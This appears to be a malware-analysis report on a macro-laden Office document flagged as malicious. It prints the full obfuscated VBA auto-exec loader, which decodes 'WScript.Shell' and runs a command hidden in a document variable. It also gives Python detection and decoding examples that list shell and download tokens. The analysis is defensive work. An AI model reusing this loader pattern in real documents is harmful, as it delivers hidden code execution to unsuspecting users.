Verdict: MALICIOUS
Risk score: 248
Heuristics: 10 matched (listed below)
CLAMAV_DETECTION (critical): ClamAV detected this file as malware: Xls.Malware.Valyria-6700358-0

OLE_VBA_MACROS (medium, 6 related findings): Document contains VBA macro code.

OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER (critical): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script: Application.Run L_Q("55546A4F5D4E5E4F59645654")
Note: L_Q reads its argument two hex digits at a time and subtracts 11 from each byte; this literal decodes to JI_DRCSDNYKI, the sub that calls T_M.

OLE_VBA_CREATEOBJ (high): CreateObject call.
Matched line in script: Dim LV_BNR As Object: Set LV_BNR = VBA.CreateObject(L_Q("625E6E7D747B7F395E73707777"))
Note: the argument decodes to WScript.Shell. Its Run method is later given L_Q(ActiveDocument.Variables("AKJ2T").Value), so the actual command line is stored in a document variable, not in the macro source; decoding the macro alone does not recover the payload.

OLE_VBA_PCODE_AUTOEXEC_EXEC (high): VBA p-code auto-exec with execution tokens. Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. For this sample the p-code dump in the preview shows the pairing directly: FuncDefn entries for Auto_Open, Document_Open and Workbook_Open and an ArgsMemLd CreateObject in the same ThisDocument stream.

OLE_VBA_DOCOPEN (low): Document_Open macro. Matched line in script: Public Sub Document_Open()

OLE_VBA_WBOPEN (low): Workbook_Open macro. Matched line in script: Sub Workbook_Open()

OLE_VBA_AUTO (low): Auto_Open macro. Matched line in script: Public Sub Auto_Open()
Note: three entry points, covering both the Word (Document_Open) and Excel (Workbook_Open) hosts; all of them run the same decoded sub name.

EXTRACTED_FILE_STATIC_TRIAGE (info): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

EMBEDDED_URL (info): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that any file carrying embedded drawings contains; nothing in the macro references it.
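The pairing rule above is easy to misread as "any auto-exec name is suspicious", so here is an added example (not the analyzer's own code) that re-implements it as described over p-code disassembly text in the layout the preview below uses. The opcode names it keys on (FuncDefn, ArgsMemLd, ArgsMemCall, ArgsLd, Ld, LitStr) are taken from that dump; the three sample streams are constructed, the first being a trimmed excerpt of this sample's dump, and the real analyzer's internal token lists are not published on this page.

```python
"""Re-implementation of the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule over
p-code disassembly lines. Added example, not the analyzer's code; the
opcode formats are assumed from the dump printed in this report."""
import re

AUTOEXEC = {"auto_open", "autoopen", "document_open", "workbook_open",
            "auto_close", "autoclose"}
EXEC_TOKENS = {"shell", "createobject", "getobject", "powershell", "cmd.exe",
               "urldownloadtofile", "winhttp", "xmlhttp", "adodb.stream",
               "shellexecute", "executeexcel4macro"}


def stream_tokens(disasm: str):
    """Yield ('entry', name) for auto-exec procedure definitions and
    ('sink', token) for execution/download identifiers or string literals
    found in one module stream's disassembly."""
    for raw in disasm.splitlines():
        line = raw.lstrip("' ").strip()          # dumps are often comment-prefixed
        m = re.match(r"FuncDefn \((?:Public |Private )?(?:Sub|Function) (\w+)\(", line)
        if m:
            if m.group(1).lower() in AUTOEXEC:
                yield "entry", m.group(1)
            continue
        # identifier operands of load/call opcodes, e.g. "ArgsMemLd CreateObject 0x0001"
        m = re.match(r"(?:ArgsMemLd|ArgsMemCall|ArgsLd|Ld|MemLd|ArgsCall) ([\w.]+)", line)
        if m and m.group(1).lower() in EXEC_TOKENS:
            yield "sink", m.group(1)
            continue
        # the same indicators may sit in a string literal, e.g. LitStr 0x0007 "cmd.exe"
        m = re.match(r'LitStr 0x[0-9A-Fa-f]+ "(.*)"$', line)
        if m and any(tok in m.group(1).lower() for tok in EXEC_TOKENS):
            yield "sink", m.group(1)


def pcode_autoexec_exec(disasm: str):
    """Return (entry points, sinks) only when both kinds co-occur in the
    stream; None means the rule does not fire (either token alone is not enough)."""
    entries, sinks = set(), set()
    for kind, tok in stream_tokens(disasm):
        (entries if kind == "entry" else sinks).add(tok)
    if entries and sinks:
        return sorted(entries), sorted(sinks)
    return None


# Constructed samples. The first is a trimmed excerpt of this report's dump.
SAMPLE_MALICIOUS = """\
' FuncDefn (Public Sub Auto_Open())
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Ld Application
' ArgsMemCall Run 0x0001
' FuncDefn (Public Sub T_M())
' ArgsLd L_Q 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set LV_BNR
' FuncDefn (Sub Workbook_Open())
"""
# auto-exec entry point only: must not fire
SAMPLE_BENIGN = """\
' FuncDefn (Sub Workbook_Open())
' LitStr 0x0009 "Sheet1!A1"
' Ld Range
' ArgsMemCall Select 0x0000
"""
# execution token only, no auto-exec entry point: must not fire
SAMPLE_SINK_ONLY = """\
' FuncDefn (Sub Button1_Click())
' LitStr 0x0014 "Scripting.Dictionary"
' ArgsLd CreateObject 0x0001
' Set dict
"""

if __name__ == "__main__":
    for name, stream in (("malicious", SAMPLE_MALICIOUS),
                         ("benign", SAMPLE_BENIGN),
                         ("sink_only", SAMPLE_SINK_ONLY)):
        print(name, pcode_autoexec_exec(stream))
```

The two negative samples are the point of the rule: a workbook with a Workbook_Open handler that only selects a range, or a button handler that creates a Scripting.Dictionary, carries one token each and stays silent; this sample's stream carries Auto_Open and Workbook_Open next to CreateObject and fires.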
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9354 bytes |

SHA-256: d2f42138a839b50b19a76f5d2955df01a3df9709863fdb4376095c7dfd946d7a

Detection (carved artifact)
ClamAV: No threats found (the signature above matched the container, not the extracted macro text)
Obfuscation or payload: likely. Carved artifact contains 22 long base64-like blob(s): the 11 hex-string literals assigned in T_M, which appear once in the decoded source and once more in the p-code dump, and which the macro never reads after assigning them.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub JI_DRCSDNYKI()
T_M
End Sub
Public Function L_Q(ByVal text As String)
Dim FDI_H As String
Dim E_P As Long
For E_P = 1 To Len(text) Step 2
FDI_H = FDI_H & Chr(Asc(Chr("&H" & Mid(text, E_P, 2))) - 11)
Next
L_Q = FDI_H
End Function
Public Sub Auto_Open()
Application.Run L_Q("55546A4F5D4E5E4F59645654")
End Sub
Public Sub Document_Open()
Application.Run L_Q("55546A4F5D4E5E4F59645654")
End Sub
Public Sub T_M()
Dim LV_BNR As Object: Set LV_BNR = VBA.CreateObject(L_Q("625E6E7D747B7F395E73707777"))
Dim ACT_HD As String
ACT_HD = "4A644A4A6F524A0F4A454A4A474A4A4A4A4A261F68184A4A84274A864A4B324A4A4A5A104A4A114A3D186C67202C4A4A2BF67255484A4A764A6E524A45134D1E3D404A4A4A4A4A4A4A4A5A4A4A4A63714A65444A4A7C6B4A7C4A4A4A854A102A544A4A180D3"
Dim AHJ_WGS As String
AHJ_WGS = "B4A4A79664A3D4A16164A4A4A4A5D4A4A4A3A611B85216D4A554A534A77644A34674A380D103E494A4A804A22417C4A2C202B4A4A4A4086177C484A4A1E4A4A174A7D4A2F4A4A4A510F444A4A1E265D4A6143135A4A4A4A4A4A4A4A394A4A614A6BF34A6D50"
Dim WBN_S As String
WBN_S = "734A4E4A3B4D474A344A494753590F724A247D4A474A62724A394A547C5B7E4A7F1C4A3017148A7A4A4A4A194A854A124A4A4A694A134A4A4A4A0C6A4A384A224A4A42884A664A0E19524A54821F4A4A4A837B4A2D4A13364A3C1D881A4A4A4A4A3E4A614A4"
Dim O_DEO As String
O_DEO = "A4A114A664A4A4A4C6E4A6B4A364A743D4A4A3A5D4D344A284A528A0E5C4E6E565D2D4A744A4A5A5186644A3B284A4A1D4A5D4A31416C7F4A4A724F4C4A4A2A891F3D144A0B4B4A4A4A4A674A4A734A77844A4A4A2F264A7034266A150F4A744A4A13644A43"
Dim E_UE As String
E_UE = "4A4A4A2F496B83234A4A4A4A4A3D6E7F4A4A21527F4A2F7F4A4A128A4A4A4A19243F4A114A874A54584A506B7D3A4A11444A234D55FE6B5A4A65634A744A4A4A8A4A4E674A6D15664A31604A1F2D4A7584801E4A4A4A7B474A4A4A6D5B4A727B4A644A4A7B1"
Dim NQR_SOV As String
NQR_SOV = "94A584A684A45784A4A8A4A4A2E4A3B114A4A80894A4A4D4A824A39301B4A4A4A4A4A4A2F68894A7E4A4A1A72574D685D4A4A4A4A644A154A494A4A371839493968334A4A4A4A4A4A5E4A1A624A4A4A184A4D4A4A8422244A4A6E4A2B4A0D44191F4A356A2F"
Dim K_WT As String
K_WT = "0F4A704A114A4A4A5D4A2B4A29714A50584A1B844A424A4A4A544A4A884A584A277D4A294A4A80594A4A584A4A27244A60594A7F14824A304A864A5F3FDB4A3B7C4466534A87774A4A8A1B4A844A4A5F4A291E4A284A4A7C4A4A4A7A4A224A4A4A174A3A4A4"
Dim BV_TTR As String
BV_TTR = "A4A4A82754F1D4A4A7B194A2880266D4A624A7D861C4A73850C4A164A4A6B31817A56652412804A464A724A4A84404A335F37676F351B4A4A194A4D844A234A4A784A104A134A5B684A424A4A434A0B4A4A4A3E4A0F4A566A4A4A15213D674A4A4A4A214A3A"
Dim E_QLD As String
E_QLD = "4A2B4A4A4A4A4A6F214A354A824A4A4A4A4A4A664A507D4A45366C4A4A4A504A394A4A4A884A1026634A7F144A314A4A4A4A4A5476824A4A4A2B4A4A4F4F7A3F52674A4A4A1873404A4A0D4A4A734A1F7A4A4A2E234A6D4A1C3C1E67313C4A1E4A4B4A6F4A4"
Dim LS_S As String
LS_S = "A744A4A4A7F4A4A51764A6F4A5B5727564A154A4A16197D4A4A2A4A4A3D4A4A4A524A4A604A4D3D5D4A4A4A464A4A2E814A65216B4A684A3E2C4A4A584A444A4A4A134A4A4A7E604B38267F4A89364A77394A6084614A664A2C714A7D0F364A4A4A624A4A4A"
Dim MFG_PA As String
MFG_PA = "8A1F4A8A2A4A4D1D4A4A654A4A7E4A4A664A7E424A4A18162F470C6F4A4A327C3E4A4A4A421C244A4A6C4A2E4A313F4A4A527F4A124A654A4A654A864A4A4A4A4A6C616D294A4E544A4A2454484A1968354A4A0F4A464A5F4A464A4A52834A2F4A3779467D4A6048714A4A4A4A444A4A4A294A4A164A784A4A0C4A4A2B4A0D3C4A4A601C204A4A4F744A4A4A694A5F4A4A4A344A4A233E4A4A837C1C7D274A4A244A4A4A0D3E854A602E4A364A818A53704A4A844A"
LV_BNR.Run L_Q(ActiveDocument.Variables("AKJ2T").Value), 0, True
End Sub
Sub Workbook_Open()
Application.Run "ThisWorkbook." & L_Q("55546A4F5D4E5E4F59645654")
End Sub
' Processing file: /opt/analyzer/scan_staging/468e7f13750341b683dd063db34d7756.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7848 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' FuncDefn (Sub JI_DRCSDNYKI())
' Line #2:
' ArgsCall T_M 0x0000
' Line #3:
' EndSub
' Line #4:
' FuncDefn (Public Function L_Q(ByVal Text As String))
' Line #5:
' Dim
' VarDefn FDI_H (As String)
' Line #6:
' Dim
' VarDefn E_P (As Long)
' Line #7:
' StartForVariable
' Ld E_P
' EndForVariable
' LitDI2 0x0001
' Ld Text
' FnLen
' LitDI2 0x0002
' ForStep
' Line #8:
' Ld FDI_H
' LitStr 0x0002 "&H"
' Ld Text
' Ld E_P
' LitDI2 0x0002
' ArgsLd Mid 0x0003
' Concat
' ArgsLd Chr 0x0001
' ArgsLd Asc 0x0001
' LitDI2 0x000B
' Sub
' ArgsLd Chr 0x0001
' Concat
' St FDI_H
' Line #9:
' StartForVariable
' Next
' Line #10:
' Ld FDI_H
' St L_Q
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Public Sub Auto_Open())
' Line #13:
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Ld Application
' ArgsMemCall Run 0x0001
' Line #14:
' EndSub
' Line #15:
' FuncDefn (Public Sub Document_Open())
' Line #16:
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Ld Application
' ArgsMemCall Run 0x0001
' Line #17:
' EndSub
' Line #18:
' FuncDefn (Public Sub T_M())
' Line #19:
' Dim
' VarDefn LV_BNR (As Object)
' BoS 0x0000
' SetStmt
' LitStr 0x001A "625E6E7D747B7F395E73707777"
' ArgsLd L_Q 0x0001
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set LV_BNR
' Line #20:
' Dim
' VarDefn ACT_HD (As String)
' Line #21:
' LitStr 0x00CB "4A644A4A6F524A0F4A454A4A474A4A4A4A4A261F68184A4A84274A864A4B324A4A4A5A104A4A114A3D186C67202C4A4A2BF67255484A4A764A6E524A45134D1E3D404A4A4A4A4A4A4A4A5A4A4A4A63714A65444A4A7C6B4A7C4A4A4A854A102A544A4A180D3"
' St ACT_HD
' Line #22:
' Dim
' VarDefn AHJ_WGS (As String)
' Line #23:
' LitStr 0x00CB "B4A4A79664A3D4A16164A4A4A4A5D4A4A4A3A611B85216D4A554A534A77644A34674A380D103E494A4A804A22417C4A2C202B4A4A4A4086177C484A4A1E4A4A174A7D4A2F4A4A4A510F444A4A1E265D4A6143135A4A4A4A4A4A4A4A394A4A614A6BF34A6D50"
' St AHJ_WGS
' Line #24:
' Dim
' VarDefn WBN_S (As String)
' Line #25:
' LitStr 0x00CB "734A4E4A3B4D474A344A494753590F724A247D4A474A62724A394A547C5B7E4A7F1C4A3017148A7A4A4A4A194A854A124A4A4A694A134A4A4A4A0C6A4A384A224A4A42884A664A0E19524A54821F4A4A4A837B4A2D4A13364A3C1D881A4A4A4A4A3E4A614A4"
' St WBN_S
' Line #26:
' Dim
' VarDefn O_DEO (As String)
' Line #27:
' LitStr 0x00CB "A4A114A664A4A4A4C6E4A6B4A364A743D4A4A3A5D4D344A284A528A0E5C4E6E565D2D4A744A4A5A5186644A3B284A4A1D4A5D4A31416C7F4A4A724F4C4A4A2A891F3D144A0B4B4A4A4A4A674A4A734A77844A4A4A2F264A7034266A150F4A744A4A13644A43"
' St O_DEO
' Line #28:
' Dim
' VarDefn E_UE (As String)
' Line #29:
' LitStr 0x00CB "4A4A4A2F496B83234A4A4A4A4A3D6E7F4A4A21527F4A2F7F4A4A128A4A4A4A19243F4A114A874A54584A506B7D3A4A11444A234D55FE6B5A4A65634A744A4A4A8A4A4E674A6D15664A31604A1F2D4A7584801E4A4A4A7B474A4A4A6D5B4A727B4A644A4A7B1"
' St E_UE
' Line #30:
' Dim
' VarDefn NQR_SOV (As String)
' Line #31:
' LitStr 0x00CB "94A584A684A45784A4A8A4A4A2E4A3B114A4A80894A4A4D4A824A39301B4A4A4A4A4A4A2F68894A7E4A4A1A72574D685D4A4A4A4A644A154A494A4A371839493968334A4A4A4A4A4A5E4A1A624A4A4A184A4D4A4A8422244A4A6E4A2B4A0D44191F4A356A2F"
' St NQR_SOV
' Line #32:
' Dim
' VarDefn K_WT (As String)
' Line #33:
' LitStr 0x00CB "0F4A704A114A4A4A5D4A2B4A29714A50584A1B844A424A4A4A544A4A884A584A277D4A294A4A80594A4A584A4A27244A60594A7F14824A304A864A5F3FDB4A3B7C4466534A87774A4A8A1B4A844A4A5F4A291E4A284A4A7C4A4A4A7A4A224A4A4A174A3A4A4"
' St K_WT
' Line #34:
' Dim
' VarDefn BV_TTR (As String)
' Line #35:
' LitStr 0x00CB "A4A4A82754F1D4A4A7B194A2880266D4A624A7D861C4A73850C4A164A4A6B31817A56652412804A464A724A4A84404A335F37676F351B4A4A194A4D844A234A4A784A104A134A5B684A424A4A434A0B4A4A4A3E4A0F4A566A4A4A15213D674A4A4A4A214A3A"
' St BV_TTR
' Line #36:
' Dim
' VarDefn E_QLD (As String)
' Line #37:
' LitStr 0x00CB "4A2B4A4A4A4A4A6F214A354A824A4A4A4A4A4A664A507D4A45366C4A4A4A504A394A4A4A884A1026634A7F144A314A4A4A4A4A5476824A4A4A2B4A4A4F4F7A3F52674A4A4A1873404A4A0D4A4A734A1F7A4A4A2E234A6D4A1C3C1E67313C4A1E4A4B4A6F4A4"
' St E_QLD
' Line #38:
' Dim
' VarDefn LS_S (As String)
' Line #39:
' LitStr 0x00CB "A744A4A4A7F4A4A51764A6F4A5B5727564A154A4A16197D4A4A2A4A4A3D4A4A4A524A4A604A4D3D5D4A4A4A464A4A2E814A65216B4A684A3E2C4A4A584A444A4A4A134A4A4A7E604B38267F4A89364A77394A6084614A664A2C714A7D0F364A4A4A624A4A4A"
' St LS_S
' Line #40:
' Dim
' VarDefn MFG_PA (As String)
' Line #41:
' LitStr 0x016A "8A1F4A8A2A4A4D1D4A4A654A4A7E4A4A664A7E424A4A18162F470C6F4A4A327C3E4A4A4A421C244A4A6C4A2E4A313F4A4A527F4A124A654A4A654A864A4A4A4A4A6C616D294A4E544A4A2454484A1968354A4A0F4A464A5F4A464A4A52834A2F4A3779467D4A6048714A4A4A4A444A4A4A294A4A164A784A4A0C4A4A2B4A0D3C4A4A601C204A4A4F744A4A4A694A5F4A4A4A344A4A233E4A4A837C1C7D274A4A244A4A4A0D3E854A602E4A364A818A53704A4A844A"
' St MFG_PA
' Line #42:
' Line #43:
' LitStr 0x0005 "AKJ2T"
' Ld ActiveDocument
' ArgsMemLd Variables 0x0001
' MemLd Value
' ArgsLd L_Q 0x0001
' LitDI2 0x0000
' LitVarSpecial (True)
' Ld LV_BNR
' ArgsMemCall Run 0x0003
' Line #44:
' EndSub
' Line #45:
' FuncDefn (Sub Workbook_Open())
' Line #46:
' LitStr 0x000D "ThisWorkbook."
' LitStr 0x0018 "55546A4F5D4E5E4F59645654"
' ArgsLd L_Q 0x0001
' Concat
' Ld Application
' ArgsMemCall Run 0x0001
' Line #47:
' EndSub
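To make the decoder concrete, here is an added example, not code from the report or from the sample, that ports L_Q to Python and scans the extracted source for what it is applied to. SAMPLE_VBA is a trimmed copy of the preview above with the decoy string literals shortened (the macro never reads them, so this changes nothing). The function names and the AKJ2T lookup are from the preview; everything else in the block is the example's own.

```python
"""Port of the macro's L_Q decoder plus a triage scan of the VBA source.
Added example; not the analyzer's or the sample's code."""
import re


def l_q(hex_text: str) -> str:
    """Port of L_Q: take the text two hex digits at a time, treat each pair as
    a byte and subtract 11 (Chr(Asc(Chr("&H" & pair)) - 11) in the macro).
    Like Mid() in VBA, a trailing lone digit is decoded as a one-digit value."""
    chars = []
    for i in range(0, len(hex_text), 2):
        value = int(hex_text[i:i + 2], 16) - 11
        if value < 0:  # Chr() of a negative value errors in VBA as well
            raise ValueError(f"pair {hex_text[i:i + 2]!r} underflows the decoder")
        chars.append(chr(value))
    return "".join(chars)


def decode_l_q_calls(vba_source: str) -> dict:
    """Every hex literal passed straight to L_Q(...), mapped to its plaintext."""
    return {lit: l_q(lit)
            for lit in re.findall(r'L_Q\("([0-9A-Fa-f]+)"\)', vba_source)}


def unused_string_literals(vba_source: str) -> list:
    """String variables assigned a hex-looking literal and never read again:
    the decoy blobs that the 'base64-like blob' triage counts."""
    assigned = re.findall(r'^\s*(\w+) = "[0-9A-Fa-f]+"\s*$', vba_source, re.M)
    # a decoy occurs exactly twice: in its Dim line and in its assignment
    return [name for name in assigned
            if len(re.findall(r"\b%s\b" % re.escape(name), vba_source)) == 2]


def runtime_inputs(vba_source: str) -> list:
    """Document variables the macro reads at run time. Their content lives in
    the document itself (w:docVars in word/settings.xml for .docx), not in the
    VBA project, so the command handed to WScript.Shell is not recoverable
    from the macro text alone."""
    return re.findall(r'ActiveDocument\.Variables\("([^"]+)"\)', vba_source)


# Constructed input: trimmed copy of the preview above, decoys shortened.
SAMPLE_VBA = '''\
Public Function L_Q(ByVal text As String)
    Dim FDI_H As String
    Dim E_P As Long
    For E_P = 1 To Len(text) Step 2
        FDI_H = FDI_H & Chr(Asc(Chr("&H" & Mid(text, E_P, 2))) - 11)
    Next
    L_Q = FDI_H
End Function
Public Sub Auto_Open()
    Application.Run L_Q("55546A4F5D4E5E4F59645654")
End Sub
Public Sub T_M()
    Dim LV_BNR As Object: Set LV_BNR = VBA.CreateObject(L_Q("625E6E7D747B7F395E73707777"))
    Dim ACT_HD As String
    ACT_HD = "4A644A4A6F524A0F4A454A4A474A4A"
    Dim AHJ_WGS As String
    AHJ_WGS = "B4A4A79664A3D4A16164A4A4A4A5D"
    LV_BNR.Run L_Q(ActiveDocument.Variables("AKJ2T").Value), 0, True
End Sub
Sub Workbook_Open()
    Application.Run "ThisWorkbook." & L_Q("55546A4F5D4E5E4F59645654")
End Sub
'''

if __name__ == "__main__":
    for lit, plain in decode_l_q_calls(SAMPLE_VBA).items():
        print(f"{lit} -> {plain}")
    print("decoy literals:", unused_string_literals(SAMPLE_VBA))
    print("run-time inputs:", runtime_inputs(SAMPLE_VBA))
```

Run against the full preview the two literals decode to JI_DRCSDNYKI and WScript.Shell, all eleven hex blobs come back as unused decoys, and the only run-time input is the AKJ2T document variable. That last result is the practical caveat: the macro is a loader shell, and the command line has to be pulled from the document's own variable store before the sample can be fully characterised.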